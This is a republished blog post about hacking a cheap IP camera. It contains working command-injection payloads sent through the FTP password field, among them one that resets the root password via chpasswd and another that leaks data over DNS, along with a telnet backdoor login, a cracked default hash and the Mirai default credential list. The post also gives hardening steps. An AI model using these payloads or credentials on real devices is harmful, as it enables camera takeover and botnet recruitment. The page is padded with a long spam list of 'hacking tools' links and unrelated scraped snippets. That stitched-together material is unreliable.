Skip to main content

How I Hacked My IP Camera, And Found This Backdoor Account

The time has come. I bought my second IoT device - in the form of a cheap IP camera. As it was the most affordable among all others, my expectations regarding security was low. But this camera was still able to surprise me.

Maybe I will disclose the camera model used in my hack in this blog later, but first, I will try to contact someone regarding these issues. Unfortunately, it seems a lot of different cameras have this problem because they share being developed on the same SDK. Again, my expectations are low on this.

The obvious problems



I opened the box, and I was greeted with a password of four numeric characters. This is the password for the "admin" user, which can configure the device, watch its output video, and so on. Most people don't care to change this anyway.

It is obvious that this camera can talk via Ethernet cable or WiFi. Luckily it supports WPA2, but people can configure it for open unprotected WiFi of course. 

Sniffing the traffic between the camera and the desktop application it is easy to see that it talks via HTTP on port 81. The session management is pure genius. The username and password are sent in every GET request. Via HTTP. Via hopefully not open WiFi. It comes really handy in case you forgot it, but luckily the desktop app already saved the password for you in clear text in 
"C:\Users\<USER>\AppData\Local\VirtualStore\Program Files (x86)\<REDACTED>\list.dat"

This nice camera communicates to the cloud via UDP. The destination servers are in Hong Kong - user.ipcam.hk/user.easyn.hk - and China - op2.easyn.cn/op3.easyn.cn. In case you wonder why an IP camera needs a cloud connection, it is simple. This IP camera has a mobile app for Android and iOS, and via the cloud, the users don't have to bother to configure port forwards or dynamic DNS to access the camera. Nice.

Let's run a quick nmap on this device.
PORT     STATE SERVICE    VERSION
23/tcp   open  telnet     BusyBox telnetd
81/tcp   open  http       GoAhead-Webs httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized
|_  Digest algorithm=MD5 opaque=5ccc069c403ebaf9f0171e9517f40e41 qop=auth realm=GoAhead stale=FALSE nonce=99ff3efe612fa44cdc028c963765867b domain=:81
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: Document Error: Unauthorized
8600/tcp open  tcpwrapped
The already known HTTP server, a telnet server via BusyBox, and a port on 8600 (have not checked so far). The 27-page long online manual does not mention any Telnet port. How shall we name this port? A debug port? Or a backdoor port? We will see. I manually tried 3 passwords for the user root, but as those did not work, I moved on.

The double-blind command injection

The IP camera can upload photos to a configured FTP server on a scheduled basis. When I configured it, unfortunately, it was not working at all, I got an invalid username/password on the server. After some debugging, it turned out the problem was that I had a special $ character in the password. And this is where the real journey began. I was sure this was a command injection vulnerability, but not sure how to exploit it. There were multiple problems that made the exploitation harder. I call this vulnerability double-blind command injection. The first blind comes from the fact that we cannot see the output of the command, and the second blind comes from the fact that the command was running in a different process than the webserver, thus any time-based injection involving sleep was not a real solution.
But the third problem was the worst. It was limited to 32 characters. I was able to leak some information via DNS, like with the following commands I was able to see the current directory:
$(ping%20-c%202%20%60pwd%60)
or cleaning up after URL decode:
$(ping -c 2 `pwd`)
but whenever I tried to leak information from /etc/passwd, I failed. I tried $(reboot) which was a pretty bad idea, as it turned the camera into an infinite reboot loop, and the hard reset button on the camera failed to work as well. Fun times.

The following are some examples of my desperate trying to get shell access. And this is the time to thank EQ for his help during the hacking session night, and for his great ideas.
$(cp /etc/passwd /tmp/a)       ;copy /etc/passwd to a file which has a shorter name
$(cat /tmp/a|head -1>/tmp/b)   ;filter for the first row
$(cat</tmp/b|tr -d ' '>/tmp/c) ;filter out unwanted characters
$(ping `cat /tmp/c`)           ;leak it via DNS
After I finally hacked the camera, I saw the problem. There is no head, tr, less, more or cut on this device ... Neither netcat, bash ...

I also tried commix, as it looked promising on Youtube. Think commix like sqlmap, but for command injection. But this double-blind hack was a bit too much for this automated tool, unfortunately.



But after spending way too much time without progress, I finally found the password to Open Sesame.
$(echo 'root:passwd'|chpasswd)
Now, logging in via telnet
(none) login: root
Password:

BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
#

Woot woot :) I quickly noticed the root of the command injection problem:

# cat /tmp/ftpupdate.sh
/system/system/bin/ftp -n<<!
open ftp.site.com 21
user ftpuser $(echo 'root:passwd'|chpasswd)
binary
mkdir  PSD-111111-REDACT
cd PSD-111111-REDACT
lcd /tmp
put 12.jpg 00_XX_XX_XX_XX_CA_PSD-111111-REDACT_0_20150926150327_2.jpg
close
bye

Whenever a command is put into the FTP password field, it is copied into this script, and after the script is scheduled, it is interpreted by the shell as commands. After this I started to panic that I forgot to save the content of the /etc/passwd file, so how am I going to crack the default telnet password? "Luckily", rebooting the camera restored the original password. 

root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh

Unfortunately, there is no need to start good-old John The Ripper for this task, as Google can tell you that this is the hash for the password 123456. It is a bit more secure than a luggage password.



It is time to recap what we have. There is an undocumented telnet port on the IP camera, which can be accessed by default with root:123456, there is no GUI to change this password, and changing it via console, it only lasts until the next reboot. I think it is safe to tell this a backdoor.
With this console access we can access the password for the FTP server, for the SMTP server (for alerts), the WiFi password (although we probably already have it), access the regular admin interface for the camera, or just modify the camera as we want. In most deployments, luckily this telnet port is behind NAT or firewall, so not accessible from the Internet. But there are always exceptions. Luckily, UPNP does not configure the Telnet port to be open to the Internet, only the camera HTTP port 81. You know, the one protected with the 4 character numeric password by default.

Last but not least everything is running as root, which is not surprising. 

My hardening list

I added these lines to the end of /system/init/ipcam.sh:
sleep 15
echo 'root:CorrectHorseBatteryRedStaple'|chpasswd
Also, if you want, you can disable the telnet service by commenting out telnetd in /system/init/ipcam.sh.

If you want to disable the cloud connection (thus rendering the mobile apps unusable), put the following line into the beginning of /system/init/ipcam.sh
iptables -A OUTPUT -p udp ! --dport 53 -j DROP
You can use OpenVPN to connect into your home network and access the web interface of the camera. It works from Android, iOS, and any desktop OS.

My TODO list

  • Investigate the script /system/system/bin/gmail_thread
  • Investigate the cloud protocol * - see update 2016 10 27
  • Buy a Raspberry Pie, integrate with a good USB camera, and watch this IP camera to burn
A quick googling revealed I am not the first finding this telnet backdoor account in IP cameras, although others found it via JTAG firmware dump. 

And 99% of the people who buy these IP cameras think they will be safe with it. Now I understand the sticker which came with the IP camera.


When in the next episode of Mr. Robot, you see someone logging into an IP camera via telnet with root:123456, you will know, it is the sad reality.

If you are interested in generic ways to protect your home against IoT, read my previous blog post on this. 

Update: as you can see in the following screenshot, the bad guys already started to take advantage of this issue ... https://www.incapsula.com/blog/cctv-ddos-botnet-back-yard.html

Update 20161006: The Mirai source code was leaked last week, and these are the worst passwords you can have in an IoT device. If your IoT device has a Telnet port open (or SSH), scan for these username/password pairs.

root     xc3511
root     vizxv
root     admin
admin    admin
root     888888
root     xmhdipc
root     default
root     juantech
root     123456
root     54321
support  support
root     (none)
admin    password
root     root
root     12345
user     user
admin    (none)
root     pass
admin    admin1234
root     1111
admin    smcadmin
admin    1111
root     666666
root     password
root     1234
root     klv123
Administrator admin
service  service
supervisor supervisor
guest    guest
guest    12345
guest    12345
admin1   password
administrator 1234
666666   666666
888888   888888
ubnt     ubnt
root     klv1234
root     Zte521
root     hi3518
root     jvbzd
root     anko
root     zlxx.
root     7ujMko0vizxv
root     7ujMko0admin
root     system
root     ikwb
root     dreambox
root     user
root     realtek
root     00000000
admin    1111111
admin    1234
admin    12345
admin    54321
admin    123456
admin    7ujMko0admin
admin    1234
admin    pass
admin    meinsm
tech     tech
mother   fucker

Update 2016 10 27: As I already mentioned this at multiple conferences, the cloud protocol is a nightmare. It is clear-text, and even if you disabled port-forward/UPNP on your router, the cloud protocol still allows anyone to connect to the camera if the attacker knows the (brute-forceable) camera ID. Although this is the user-interface only, now the attacker can use the command injection to execute code with root privileges. Or just grab the camera configuration, with WiFi, FTP, SMTP passwords included.
Youtube video : https://www.youtube.com/watch?v=18_zTjsngD8
Slides (29 - ) https://www.slideshare.net/bz98/iot-security-is-a-nightmare-but-what-is-the-real-risk

Update 2017-03-08: "Because of code reusing, the vulnerabilities are present in a massive list of cameras (especially the InfoLeak and the RCE),
which allow us to execute root commands against 1250+ camera models with a pre-auth vulnerability. "https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt

Update 2017-05-11: CVE-2017-5674 (see above), and my command injection exploit was combined in the Persirai botnet. 120 000 cameras are expected to be infected soon. If you still have a camera like this at home, please consider the following recommendation by Amit Serper "The only way to guarantee that an affected camera is safe from these exploits is to throw it out. Seriously."
This issue might be worse than the Mirai worm because these effects cameras and other IoT behind NAT where UPnP was enabled.
http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/


Related articles
  1. Hacking Tools For Windows
  2. Hacking Tools Pc
  3. Game Hacking
  4. Hacker Tools Mac
  5. Hack Tools 2019
  6. Hackrf Tools
  7. Hacker Tools Windows
  8. Hack Tools For Pc
  9. Hacker Tools Free Download
  10. Hack Tool Apk
  11. Hacking Tools For Windows Free Download
  12. Hacking Tools For Windows 7
  13. Game Hacking
  14. Nsa Hacker Tools
  15. Pentest Tools Nmap
  16. Pentest Tools Subdomain
  17. Pentest Tools For Ubuntu
  18. Hacking Tools 2020
  19. Computer Hacker
  20. Ethical Hacker Tools
  21. Hacking App
  22. Hacker Tools Online
  23. Hacking Tools 2020
  24. Hackrf Tools
  25. Hacker Tools Online
  26. Hacking Tools Free Download
  27. Hacker Tools Linux
  28. Pentest Tools Find Subdomains
  29. Pentest Tools
  30. Hacker Tools For Ios
  31. Hacker Tools Mac
  32. Hacker
  33. Hack Tools
  34. Hacker Tools Free
  35. Hacker Techniques Tools And Incident Handling
  36. Pentest Tools Port Scanner
  37. Hack Website Online Tool
  38. Hacking Tools Pc
  39. Hacker Tools For Pc
  40. Hacker Tools Mac
  41. Hacking Tools For Beginners
  42. Pentest Tools Free
  43. Android Hack Tools Github
  44. Install Pentest Tools Ubuntu
  45. Hacking Tools And Software
  46. How To Make Hacking Tools
  47. Hacking Tools For Windows 7
  48. Pentest Tools Url Fuzzer
  49. Hack Website Online Tool
  50. Hacker Tools Mac
  51. Game Hacking
  52. Hack Tools For Pc
  53. Pentest Automation Tools
  54. Pentest Tools List
  55. Underground Hacker Sites
  56. Pentest Reporting Tools
  57. Pentest Tools Url Fuzzer
  58. Hacker Security Tools
  59. Hacker Tools Apk Download
  60. Hack Apps
  61. Hacking Tools Free Download
  62. Hacker Tools For Pc
  63. Hack Tools For Pc
  64. Free Pentest Tools For Windows
  65. Hacking Tools And Software
  66. Hacker Tools Software
  67. Hacker Techniques Tools And Incident Handling
  68. Tools 4 Hack
  69. Computer Hacker
  70. Pentest Box Tools Download
  71. Beginner Hacker Tools
  72. Hacker Tools Linux
  73. Hacking Tools Download
  74. Nsa Hacker Tools
  75. Hacker Tools For Ios
  76. Hack Tools For Windows
  77. Hacking Tools For Beginners
  78. Github Hacking Tools
  79. Game Hacking
  80. Hacker Tools Free
  81. Pentest Tools Github
  82. Hacking Tools Usb
  83. Pentest Tools Subdomain
  84. New Hack Tools
  85. Pentest Tools Tcp Port Scanner
  86. Pentest Tools Alternative
  87. Hacking Tools And Software
  88. Hack Tools For Mac
  89. Pentest Tools Github
  90. Pentest Tools Url Fuzzer
  91. Pentest Tools Framework
  92. Github Hacking Tools
  93. Hacker Tools For Ios
  94. Pentest Tools Port Scanner
  95. Tools For Hacker
  96. Hacker Tools Apk Download
  97. Hack Tools Mac
  98. Hacker
  99. Pentest Tools For Mac
  100. Pentest Tools Url Fuzzer
  101. Hack And Tools
  102. Hacking App
  103. Hacking Tools 2019
  104. What Is Hacking Tools
  105. Hacking Tools For Mac
  106. Hacking Tools 2019
  107. Pentest Tools Port Scanner
  108. Hacking Tools For Windows
  109. Hacker
  110. Pentest Tools Find Subdomains
  111. Hack App
  112. Nsa Hacker Tools
  113. Hacker Security Tools
  114. Hacking Tools Software
  115. Best Hacking Tools 2019
  116. Pentest Tools For Ubuntu
  117. Hacking Tools For Kali Linux
  118. Hacking App
  119. Pentest Tools Github
  120. Tools For Hacker
  121. Pentest Tools Website Vulnerability
  122. Hacking Tools For Pc
  123. Best Hacking Tools 2019
  124. Hacking Tools
  125. Hacking Tools And Software
  126. Android Hack Tools Github
  127. Hack Tools
  128. Blackhat Hacker Tools
  129. Growth Hacker Tools
  130. Beginner Hacker Tools
  131. Wifi Hacker Tools For Windows
  132. How To Hack
  133. Hacker Search Tools
  134. Hacking Tools For Pc
  135. Hacker Hardware Tools
  136. Pentest Box Tools Download
  137. Hack And Tools
  138. Pentest Tools Website Vulnerability
  139. Hacking Tools Online
  140. Nsa Hack Tools Download
  141. Hacking Tools For Kali Linux
  142. Hack Tool Apk
  143. Hacking Tools For Windows
  144. How To Install Pentest Tools In Ubuntu
  145. Hacking Tools For Windows 7
  146. Hacking Tools For Windows 7
  147. How To Make Hacking Tools
  148. Hacking Tools Mac
  149. Pentest Tools Framework
  150. Hacking Tools Hardware
  151. Hacking Tools For Games
  152. Pentest Tools Download
  153. Pentest Tools Nmap
  154. Pentest Tools For Android
  155. Computer Hacker
  156. Hacker Tools Software
  157. Hack Tools 2019
  158. Pentest Tools Open Source
  159. World No 1 Hacker Software
  160. Hack Tools Download
  161. Hacker Tools Linux
  162. Hacking Apps
  163. Hack Tools Github
  164. Pentest Tools Linux
  165. Hacking Tools Windows 10
  166. Pentest Tools Tcp Port Scanner
  167. Hacker Hardware Tools
  168. Tools 4 Hack
  169. What Is Hacking Tools
  170. Hack Tools

Comments

Popular posts from this blog

דף הבית | הטכניון - מכון טכנולוגי לישראל

https://technion.ac.il http://library.technion.ac.il/he https://www.technion.ac.il/%D7%A8%D7%A9%D7%99%D7%9E%D7%AA-%D7%94%D7%A4%D7%A7%D7%95%D7%9C%D7%98%D7%95%D7%AA-2/ http://www.admin.technion.ac.il/dpcalendar/ https://www.technion.ac.il/%D7%94%D7%A0%D7%94%D7%9C%D7%94-%D7%91%D7%9B%D7%99%D7%A8%D7%94/ https://www.technion.ac.il/%D7%A1%D7%9E%D7%99%D7%A0%D7%A8%D7%99%D7%9D/ https://dean.web.technion.ac.il/%D7%A7%D7%9E%D7%A4%D7%95%D7%A1-%D7%AA%D7%95%D7%A1%D7%A1/ http://www.dmag.co.il/pub/technion/tmag.html http://moodle.technion.ac.il/ https://tender-logistics.web3.technion.ac.il http://cis.technion.ac.il/ http://video.technion.ac.il/ https://portal.technion.ac.il/irj/portal https://www.technion.ac.il/ https://www.technion.ac.il/en/home-2/ http://arabic.net.technion.ac.il https://www.technion.ac.il/%d7%97%d7%96%d7%95%d7%9f-%d7%94%d7%98%d7%9b%d7%a0%d7%99%d7%95%d7%9f/ https://www.technion.ac.il/%d7%94%d7%99%d7%a1%d7%98%d7%95%d7%a8%d7%99%d7%99%d7%aa-%d7%94%d7%98%d7%9b%d7%a0%d7%99%d7%95%d7%9f/ ht...

Gu Energy Gel for Sale

Get Gu Energy Gel Here - https://bit.ly/3f97Wvz _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

To Kilinochchi or Mankulam?- The Nation- 2008/09/07

This week saw one of the most ferocious battles since the security forces started their campaign to regain the Wanni around mid last year. The LTTE’s much anticipated counter strike was launched along their newly built trench line from the western coastal town Nachchikudah to the deep interior region Akkarayankulam, a fair distance of 18-20 km in length. This trench line, which is mainly an earth bund of around 7-15 feet at certain places, was built in recent times with heavy machinery cutting across shrub jungles. In a series of waves, the LTTE attacked personnel of the Army’s 58 and 57 Divisions last Wednesday in a battle that lasted 36 hours. The LTTE claimed to have killed up to 100 military personnel, while the military initially claimed that only nine soldiers were killed. However, with the LTTE claiming that they had recovered the bodies of 29 soldiers and posted pictures of the dead on pro-LTTE websites, the Army said that ...